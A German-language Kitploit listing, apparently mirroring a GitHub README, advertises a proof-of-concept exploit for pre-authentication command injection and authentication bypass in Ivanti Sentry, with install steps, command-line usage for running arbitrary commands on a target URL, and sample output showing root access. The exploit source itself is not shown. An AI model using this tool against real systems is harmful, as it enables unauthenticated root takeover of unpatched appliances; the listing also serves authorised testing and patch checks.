Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-10520 — CVE-2026-10520 | Kitploit
Tools/GitHubGitHub/0xblackash/cve-2026-10520
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and ControlRed Teaming
GitHub0xblackash/cve-2026-10520

CVE-2026-10520

CVE-2026-10520

Repository anzeigen
450vor 3 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

🎯 CVE-2026-10520 & CVE-2026-10523 - Ivanti Sentry

ChatGPT Image Jun 11, 2026, 11_19_12 AM

Ivanti Sentry Critical RCE

Remote-Code-Ausführung ohne Authentifizierung + Authentifizierungsumgehung

Autor: Ashraf Zaryouh "0xBlackash"

GitHub


📌 Überblick

Zwei kritische Schwachstellen, die Ivanti Sentry (ehemals MobileIron Sentry) betreffen:

  • CVE-2026-10520 → CVSS 10.0 - OS-Befehlsinjektion ohne Authentifizierung (RCE als root)
  • CVE-2026-10523 → CVSS 9.9 - Authentifizierungsumgehung

Diese Schwachstellen ermöglichen es nicht authentifizierten Angreifern, das gesamte System zu kompromittieren.


✨ Funktionen

  • ✅ Sauberer und schneller PoC
  • ✅ Keine Authentifizierung (keine Anmeldedaten erforderlich)
Tool herunterladen
  • ✅ Befehlsausführung auf Root-Ebene
  • ✅ Detaillierte Ausgabeformatierung
  • ✅ Proxy-Unterstützung
  • ✅ Ausführlicher Modus
  • ✅ Schöne Terminal-Oberfläche

  • 🚀 Verwendung

    root@kitploit:~
    python3 CVE-2026-10520.py --url <TARGET> --cmd <COMMAND>
    

    Beispiele

    root@kitploit:~
    # Basic usage
    python3 CVE-2026-10520.py --url https://target.com:8443 --cmd "id"
    
    # Verbose mode
    python3 CVE-2026-10520.py --url https://target.com:8443 --cmd "whoami" -v
    
    # With proxy
    python3 CVE-2026-10520.py --url https://target.com:8443 --cmd "uname -a" --proxy 127.0.0.1:8080
    
    # Check kernel
    python3 CVE-2026-10520.py --url https://target.com:8443 --cmd "uname -a"
    

    📋 Optionen

    ArgumentBeschreibungErforderlich
    --urlZiel-URL (z.B. https://target:8443)Ja
    --cmdAuszuführender BefehlJa
    -v, --verboseAusführliche Ausgabe aktivierenNein
    --proxyHTTP-Proxy (Host:Port)Nein

    🛠️ Installation

    root@kitploit:~
    git clone https://github.com/0xBlackash/CVE-2026-10520.git
    cd CVE-2026-10520
    chmod +x CVE-2026-10520.py
    

    📷 Erfolgreiche Ausnutzung

    Wenn angreifbar, sehen Sie:

    root@kitploit:~
    
     ██████╗ ██╗  ██╗██████╗ ██╗      █████╗  ██████╗██╗  ██╗ █████╗ ███████╗██╗  ██╗
    ██╔═████╗╚██╗██╔╝██╔══██╗██║     ██╔══██╗██╔════╝██║ ██╔╝██╔══██╗██╔════╝██║  ██║
    ██║██╔██║ ╚███╔╝ ██████╔╝██║     ███████║██║     █████╔╝ ███████║███████╗███████║
    ████╔╝██║ ██╔██╗ ██╔══██╗██║     ██╔══██║██║     ██╔═██╗ ██╔══██║╚════██║██╔══██║
    ╚██████╔╝██╔╝ ██╗██████╔╝███████╗██║  ██║╚██████╗██║  ██╗██║  ██║███████║██║  ██║
     ╚═════╝ ╚═╝  ╚═╝╚═════╝ ╚══════╝╚═╝  ╚═╝ ╚═════╝╚═╝  ╚═╝╚═╝  ╚═╝╚══════╝╚═╝  ╚═╝
      
              CVE-2026-10520 & CVE-2026-10523 PoC Exploit
              Ivanti Sentry Pre-Auth RCE + Auth Bypass
              
              Author: Ashraf Zaryouh "0xBlackash"
              GitHub: https://github.com/0xBlackash
    
    
    [+] Target is VULNERABLE!
    Command Output:
    uid=0(root) gid=0(root) groups=0(root)
    

    ⚠️ Haftungsausschluss

    Dieses Tool ist ausschließlich für Bildungs- und autorisierte Sicherheitstests bestimmt.
    Die unbefugte Verwendung gegen Systeme, die Ihnen nicht gehören, ist illegal.
    Der Autor übernimmt keine Verantwortung für Missbrauch.


    🔧 Betroffene Versionen

    • Ivanti Sentry vor 10.5.2, 10.6.2, 10.7.1

    Behoben in: 10.5.2 / 10.6.2 / 10.7.1


    📜 Referenzen

    • Offizielle Ivanti Advisory
    • Originalforschung von watchTowr Labs
    • NVD-Einträge: CVE-2026-10520, CVE-2026-10523

    Erstellt mit ❤️ von Ashraf Zaryouh "0xBlackash"

    Star das Repository, wenn es dir geholfen hat! ⭐